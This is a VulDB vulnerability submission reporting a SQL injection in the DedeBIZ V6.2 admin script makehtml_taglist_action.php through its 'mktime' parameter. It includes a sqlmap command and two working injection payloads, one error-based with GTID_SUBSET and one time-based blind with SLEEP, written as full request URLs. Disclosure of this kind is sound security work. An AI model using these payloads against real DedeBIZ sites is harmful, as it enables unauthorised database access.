Submit #211260: SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.phpinfo

TitleSQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
Description[Suggested description] SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php [Vulnerability Type] SQL INJECTION [Vendor of Product] https://github.com/DedeBIZ/DedeV6 [Affected Product Code Base] DedeBIZ V6.2 [Affected Component] File: /src/admin/makehtml_taglist_action.php Parameter: mktime python sqlmap.py -r sql.txt --current-db Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf) [Attack Type] Remote
Source⚠️ https://github.com/yhy217/dedebiz--vul/issues/2
User
 jamspilly (UID 54414)
Submission09/21/2023 11:20 (3 years ago)
Moderation09/29/2023 08:01 (8 days later)
StatusAccepted
VulDB entry240881 [DedeBIZ 6.2 makehtml_taglist_action.php mktime sql injection]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!